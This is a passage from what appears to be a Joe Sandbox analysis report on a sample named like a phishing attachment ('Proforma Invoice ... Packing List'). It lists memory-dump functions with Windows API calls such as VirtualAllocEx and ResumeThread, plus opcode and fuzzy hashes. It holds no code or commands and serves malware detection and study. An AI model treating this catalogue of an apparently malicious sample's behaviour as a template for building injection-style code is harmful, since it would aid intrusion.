                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumThreadWindows.USER32(?,00000000,?), ref: 0727F351
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumThreadWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2941952884-0
                                                                                            • Opcode ID: 1e004bee5fd7e8da2817b6b399659683035121f4cc9a6005c840904a2a330f61
                                                                                            • Instruction ID: a388fa49b255ca74670a84a0a253274d31c3de190ece124cc20814d6a11c7ef5
                                                                                            • Opcode Fuzzy Hash: 1e004bee5fd7e8da2817b6b399659683035121f4cc9a6005c840904a2a330f61
                                                                                            • Instruction Fuzzy Hash: 082149B1D0425A8FDB14CFAAC944BEEFBF5FB88310F148429D458A3250C778A945CFA5
                                                                                            Function 0B06A73F Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B06A76D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: b06f3364fd61d80fd860dfb3872bed368e13e54840200398f2e9adfbe140a147
                                                                                            • Instruction ID: 15907bef092691cac973a190157ca44e9b7c97deb2b17487139015abd011d1f6
                                                                                            • Opcode Fuzzy Hash: b06f3364fd61d80fd860dfb3872bed368e13e54840200398f2e9adfbe140a147
                                                                                            • Instruction Fuzzy Hash: CB1152343105508FD76DAB39C8548697BF6AF86B5531544EAE502CB3B6DE35DC02CB60
                                                                                            Function 00A5D770 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A5D7F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769243295.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a50000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: c51440cd5db51583bcceef37740b3b75f72027b7b7f2727223ed36bc1a9261af
                                                                                            • Instruction ID: 0fd946b9b777155025fcd19217733e1c6125f9454d7e1e3b16e1a41c6d288420
                                                                                            • Opcode Fuzzy Hash: c51440cd5db51583bcceef37740b3b75f72027b7b7f2727223ed36bc1a9261af
                                                                                            • Instruction Fuzzy Hash: AF21E2B5900249DFDB10CFAAD984ADEFBF8FB48320F14801AE918A3310D374A944CFA5
                                                                                            Function 07277840 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetClassInfoW.USER32(?,00000000), ref: 072778BC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassInfo
                                                                                            • String ID:
                                                                                            • API String ID: 3534257612-0
                                                                                            • Opcode ID: cd7c9e240a7dcda85ead5235c696598cf5e00d47e1f3b1661f840438a5c8e6ee
                                                                                            • Instruction ID: 2bb10149f0365a853c1db57973becc7a930c0d4c22603f39a718b35cebad2f79
                                                                                            • Opcode Fuzzy Hash: cd7c9e240a7dcda85ead5235c696598cf5e00d47e1f3b1661f840438a5c8e6ee
                                                                                            • Instruction Fuzzy Hash: 162104B1D0171A9FDB10CF9AC984ADEFBF4EB48310F14802AE458A7350D374A944CBA5
                                                                                            Function 0727845F Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32 ref: 072784D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: ForegroundWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2020703349-0
                                                                                            • Opcode ID: 75017fd2b71e8caa59b28b628f2c5ad88058ccdb0b0428c5d5e06359ad001185
                                                                                            • Instruction ID: bbc1b1d9c4a7bc7e1140cd1a607f5ff3a0cef9cdd84f968cc31e97b5b2a511d4
                                                                                            • Opcode Fuzzy Hash: 75017fd2b71e8caa59b28b628f2c5ad88058ccdb0b0428c5d5e06359ad001185
                                                                                            • Instruction Fuzzy Hash: 5921C0B1D1071ACFCB209FA9C2592EEBBF1AB88310F248419C51AA7350DB759545CF91
                                                                                            Function 0727F2E0 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumThreadWindows.USER32(?,00000000,?), ref: 0727F351
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnumThreadWindows
                                                                                            • String ID:
                                                                                            • API String ID: 2941952884-0
                                                                                            • Opcode ID: baf34a5f63513642553d65713328bb29dd480ef83c4e36cdf1339a0637745fb3
                                                                                            • Instruction ID: 0371a15642bf463741162fe2881141b700b757daa0e7f7fce9cd0a4464e89f7c
                                                                                            • Opcode Fuzzy Hash: baf34a5f63513642553d65713328bb29dd480ef83c4e36cdf1339a0637745fb3
                                                                                            • Instruction Fuzzy Hash: 342147B1D0025A8FDB10CF9AC944BEEFBF4EB88320F14842AD458A3250C778A945CFA5
                                                                                            Function 0B06A750 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0B06A76D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775247501.000000000B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B060000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b060000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 6e2835a277a5d6425086d6b3ab11a2940f543dccc604de23f08447a197b61b32
                                                                                            • Instruction ID: 527e9a524bb03be89045a4d88c6dd310b78088039b528d119bcdbed7f2028e36
                                                                                            • Opcode Fuzzy Hash: 6e2835a277a5d6425086d6b3ab11a2940f543dccc604de23f08447a197b61b32
                                                                                            • Instruction Fuzzy Hash: EF1129343505108FC76CBB39C85486A77EAAFC9AA531584A9E502CB3B5DE72DC02CB90
                                                                                            Function 07271D19 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07271D8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 8d321bb22c93224153ae5bade902ed7e1756318be109bd87a5c2638e9cb7b7ec
                                                                                            • Instruction ID: 65fcec5134b2e30931f6be3a89e3ab57a1201a3f8e61ac5c9a47c951c3f2ac11
                                                                                            • Opcode Fuzzy Hash: 8d321bb22c93224153ae5bade902ed7e1756318be109bd87a5c2638e9cb7b7ec
                                                                                            • Instruction Fuzzy Hash: 8E1167B28002499FCB10CFA9C884BDFBFF5EF88324F248419E555A7250C735A951CFA0
                                                                                            Function 07278470 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32 ref: 072784D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: ForegroundWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2020703349-0
                                                                                            • Opcode ID: 08f2c838756d76b7def7a36802c6ca7b4731efd2fa77dbb68db1e8e541003c1e
                                                                                            • Instruction ID: eeaefc25a768f1ba9270fcdfac82d32e5e7e309690d5d628988873c645f21691
                                                                                            • Opcode Fuzzy Hash: 08f2c838756d76b7def7a36802c6ca7b4731efd2fa77dbb68db1e8e541003c1e
                                                                                            • Instruction Fuzzy Hash: 2A11AFB0D1071ACFCB209FA9C2482EFBBF5AB48310F248819C51AA7340DB749544CFA2
                                                                                            Function 0737B231 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PeekMessageW.USER32(?,?,?,?,?), ref: 0737B2A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePeek
                                                                                            • String ID:
                                                                                            • API String ID: 2222842502-0
                                                                                            • Opcode ID: 84689a0b68ee36451d556bf6cb68a59bffc7e25187a5ba1137060fb6ccfbe214
                                                                                            • Instruction ID: 6c20e92d629ee795d7b4c063fb7e80dda46698f209a001454688960daf8868cc
                                                                                            • Opcode Fuzzy Hash: 84689a0b68ee36451d556bf6cb68a59bffc7e25187a5ba1137060fb6ccfbe214
                                                                                            • Instruction Fuzzy Hash: 742117B5C0025ADFDB10CF9AD584ADEFBF4FB48320F10842AE958A3251D378A584CFA5
                                                                                            Function 0737B5D0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0737B63D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: fbd2f033380f30768881f124de6d55d59b2e231490e1970fa9eeb0502a2f4e74
                                                                                            • Instruction ID: f52df6fe040bb961bbdbccafd2495cd99a39df8cd23d31b1e68891567bb0c476
                                                                                            • Opcode Fuzzy Hash: fbd2f033380f30768881f124de6d55d59b2e231490e1970fa9eeb0502a2f4e74
                                                                                            • Instruction Fuzzy Hash: A31114B58003499FDB10CF9AD944BDEFBF8EB48320F10852AE968A3251C378A545CFA5
                                                                                            Function 07277760 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 072777CA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 530164218-0
                                                                                            • Opcode ID: cd1fa9694fe6491dfcf0eb8cc6a0ebd9f88d1b95347abef49d2a802d45b1d289
                                                                                            • Instruction ID: c2d776b779b723492d8e67b2eda180f754a296fc950564e307917cc7d84b19d0
                                                                                            • Opcode Fuzzy Hash: cd1fa9694fe6491dfcf0eb8cc6a0ebd9f88d1b95347abef49d2a802d45b1d289
                                                                                            • Instruction Fuzzy Hash: 371114B680020A8FDB10CF9AC944BDEFBF4EB88320F10C42AD858A7250D378A545CFA5
                                                                                            Function 07271D20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07271D8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: ccce4f8b7362322c3a1579a4f193ad778eab0286c484cb179e24364e46c0738e
                                                                                            • Instruction ID: 7f1ea707b04f802a11eea5722e07d32fd8b7bfd7da13474f914ac5dbe5f750b3
                                                                                            • Opcode Fuzzy Hash: ccce4f8b7362322c3a1579a4f193ad778eab0286c484cb179e24364e46c0738e
                                                                                            • Instruction Fuzzy Hash: E81156B28002499FCB10DFAAC944ADEBBF5EF88320F108819E519A7250C735A950CFA4
                                                                                            Function 0737B238 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PeekMessageW.USER32(?,?,?,?,?), ref: 0737B2A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePeek
                                                                                            • String ID:
                                                                                            • API String ID: 2222842502-0
                                                                                            • Opcode ID: 8c4efd0379a438d939c65bd7e2dc23d1ab83758655417f5be422d412cfc6214a
                                                                                            • Instruction ID: 9745bcbe368ff1c843ef639e42ce7a3f622cb3900eb4dcd9cd8bd636fedd9899
                                                                                            • Opcode Fuzzy Hash: 8c4efd0379a438d939c65bd7e2dc23d1ab83758655417f5be422d412cfc6214a
                                                                                            • Instruction Fuzzy Hash: 3011F6B5C00249DFDB10CF9AD584BDEFBF8EB48320F10842AE958A3251C378A544CFA5
                                                                                            Function 04DE0398 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 04DE03F8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772410012.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4de0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentThread
                                                                                            • String ID:
                                                                                            • API String ID: 2882836952-0
                                                                                            • Opcode ID: b6321e8d80d74864fe2912228ff84b270a58a2c73f9a41432696a1a6d17862eb
                                                                                            • Instruction ID: 348609be0ff2238a3890e58f02b5fbe0f886f8baa3a2271480c49d71c44e1fef
                                                                                            • Opcode Fuzzy Hash: b6321e8d80d74864fe2912228ff84b270a58a2c73f9a41432696a1a6d17862eb
                                                                                            • Instruction Fuzzy Hash: A0113AB1D002598FDB10DF9AC6457EEBBF8EB48320F14842AD459A3241D774A584CFA5
                                                                                            Function 0737B5D8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0737B63D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 0249c182d7d5974cc07319c196ee075c8f5620350bbf5833c7649387675887ff
                                                                                            • Instruction ID: d04dca5ac4777ef60928da9af6b40bacf4d7036f6e45d8971a841daf89bf97bc
                                                                                            • Opcode Fuzzy Hash: 0249c182d7d5974cc07319c196ee075c8f5620350bbf5833c7649387675887ff
                                                                                            • Instruction Fuzzy Hash: 4A11C3B5800259DFDB10DF9AD944BDEFBF8EB48324F10842AE558A3250C378A545CFA5
                                                                                            Function 07370C40 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07370CA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: 9ebe3c8804c06508cb3d4422048097a7f1a38cb6c1b71abf74a70e2ee8f3452b
                                                                                            • Instruction ID: 23cacda2f290cbcd641910191a027fbef312ab1d4df36a88bcbffbac14d5b8ec
                                                                                            • Opcode Fuzzy Hash: 9ebe3c8804c06508cb3d4422048097a7f1a38cb6c1b71abf74a70e2ee8f3452b
                                                                                            • Instruction Fuzzy Hash: 6C1116B5800249DFDB20CF99C545BDEBFF8FB48320F108459E959A7200C375A544CFA5
                                                                                            Function 04DE0397 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 04DE03F8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1772410012.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4de0000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentThread
                                                                                            • String ID:
                                                                                            • API String ID: 2882836952-0
                                                                                            • Opcode ID: 0dceb790ea7484a547686270243d9107842a04e5860b9e53b70ee68e1cc791e5
                                                                                            • Instruction ID: e348b19c85450e130d05eef6d64791e2b4bc013e7ffc66561f6c4a9db15cacd8
                                                                                            • Opcode Fuzzy Hash: 0dceb790ea7484a547686270243d9107842a04e5860b9e53b70ee68e1cc791e5
                                                                                            • Instruction Fuzzy Hash: FD1136B1D002598FDB20DF9AC6457EEBBF4EB48320F14842AD459A3241D778A988CFA1
                                                                                            Function 07271B98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774294080.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7270000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 60cca81012f78d5896d28b3b75c3e642ae23b5022801033dd3e577ea2e05ca97
                                                                                            • Instruction ID: e02cb3f4335bd7ed11c78ad36f47601e7916b62c1ad943f2f9a96c42ec7dfa50
                                                                                            • Opcode Fuzzy Hash: 60cca81012f78d5896d28b3b75c3e642ae23b5022801033dd3e577ea2e05ca97
                                                                                            • Instruction Fuzzy Hash: 231136B1D002498FDB20DFAAC5457DEFBF4EF88324F208829D559A7250CB75A984CFA5
                                                                                            Function 07375FA8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07376005
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: 4f6a33217782c7cf92c922fa10c0c3ee53735d325c28ef9d54d396ad718c3e06
                                                                                            • Instruction ID: 00a54d1bf1ca49b5c205e3d0cd0b965f97d557116057bf15055c713128c9d651
                                                                                            • Opcode Fuzzy Hash: 4f6a33217782c7cf92c922fa10c0c3ee53735d325c28ef9d54d396ad718c3e06
                                                                                            • Instruction Fuzzy Hash: A21148B5800349DFDB10CF9AC945BEEFBF8EB48320F108419E558A3250C379A984CFA5
                                                                                            Function 00A5B078 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00A5B0DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1769243295.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a50000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 2c4f2df1ef8e41788c18f12ea518c90c6ff0b103780363b330d0e601f5fb25e5
                                                                                            • Instruction ID: 9cda3f01fa2ca570c34ba2006cb89d8b2452db7adc7b2a26840d2e1e5198a5a6
                                                                                            • Opcode Fuzzy Hash: 2c4f2df1ef8e41788c18f12ea518c90c6ff0b103780363b330d0e601f5fb25e5
                                                                                            • Instruction Fuzzy Hash: 3B110FB6C002498FCB10CF9AC444ADFFBF4EB88324F10842AD829A7250D375A545CFA1
                                                                                            Function 0737BAA0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatchMessage
                                                                                            • String ID:
                                                                                            • API String ID: 2061451462-0
                                                                                            • Opcode ID: 7d83f491e108aa30828263361b5a055873a5c2a6f9dfa845493f2be39498b832
                                                                                            • Instruction ID: 637684cd8e99611b807d57ded6cd682f53658f9758cf5d488b6a4e830017a6ed
                                                                                            • Opcode Fuzzy Hash: 7d83f491e108aa30828263361b5a055873a5c2a6f9dfa845493f2be39498b832
                                                                                            • Instruction Fuzzy Hash: 4A1100B5D00259CFCB20DFAAD544BDEFBF4EB48324F10842AE859A7210D379A545CFA9
                                                                                            Function 07370C48 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 07370CA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePost
                                                                                            • String ID:
                                                                                            • API String ID: 410705778-0
                                                                                            • Opcode ID: f4f8808517a341f60bc596b7075f3b9d9c0fbbce478b10c30a4456afb7944bfe
                                                                                            • Instruction ID: dad9f0dc25f9344e0742d6f09622e96655d046658a013f807c29c6c0018f06a9
                                                                                            • Opcode Fuzzy Hash: f4f8808517a341f60bc596b7075f3b9d9c0fbbce478b10c30a4456afb7944bfe
                                                                                            • Instruction Fuzzy Hash: D211D3B5800349DFDB10DF9AC985BDEFBF8EB48324F108459E558A7210C375A944CFA5
                                                                                            Function 0737BAA8 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1774333355.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7370000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatchMessage
                                                                                            • String ID:
                                                                                            • API String ID: 2061451462-0
                                                                                            • Opcode ID: 72b9fd76b45a83270dcd481272ed54f80dc690e7291e8bdc337bc8d6483fe247
                                                                                            • Instruction ID: 33fa63c5a848de012cf3ff40a9e1c8dd19a3eb1f2d19e55a20f4a20bdfee00cb
                                                                                            • Opcode Fuzzy Hash: 72b9fd76b45a83270dcd481272ed54f80dc690e7291e8bdc337bc8d6483fe247
                                                                                            • Instruction Fuzzy Hash: B3111EB5C00249CFCB20CF9AD544BDEFBF8EB48324F10842AE819A3210C378A544CFA9
                                                                                            Function 0B0402B4 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (
                                                                                            • API String ID: 0-3887548279
                                                                                            • Opcode ID: 66921c5a972454602dc484fbb446062e671bc607becad8b33ac428db486fa79e
                                                                                            • Instruction ID: 17edf94bb416986c1c7170b055043a4cf5d60bde567e7a4e81251ad2f35194bf
                                                                                            • Opcode Fuzzy Hash: 66921c5a972454602dc484fbb446062e671bc607becad8b33ac428db486fa79e
                                                                                            • Instruction Fuzzy Hash: CF0114B5909218CFDB24CB64C940BECB7B9FB4A304F0492EAD509B3252D7309A82CF00
                                                                                            Function 0B042238 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b040000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: M
                                                                                            • API String ID: 0-3664761504
                                                                                            • Opcode ID: 0e413e58065623810ac18bd32f80541c4a75b0cf5edb489f57377c4918f4b551
                                                                                            • Instruction ID: 4421b79d7352b1970245535559b25286fc87e1e2b0edbaf1072c3178e8c00354
                                                                                            • Opcode Fuzzy Hash: 0e413e58065623810ac18bd32f80541c4a75b0cf5edb489f57377c4918f4b551
                                                                                            • Instruction Fuzzy Hash: E2E0C2B0E15208EBCB08EBB8D5447AC7BF8EB05200F1001A9E80593240E7301E509741
                                                                                            Function 0B0413A0 Relevance: .1, Instructions: 145COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1775224877.000000000B040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
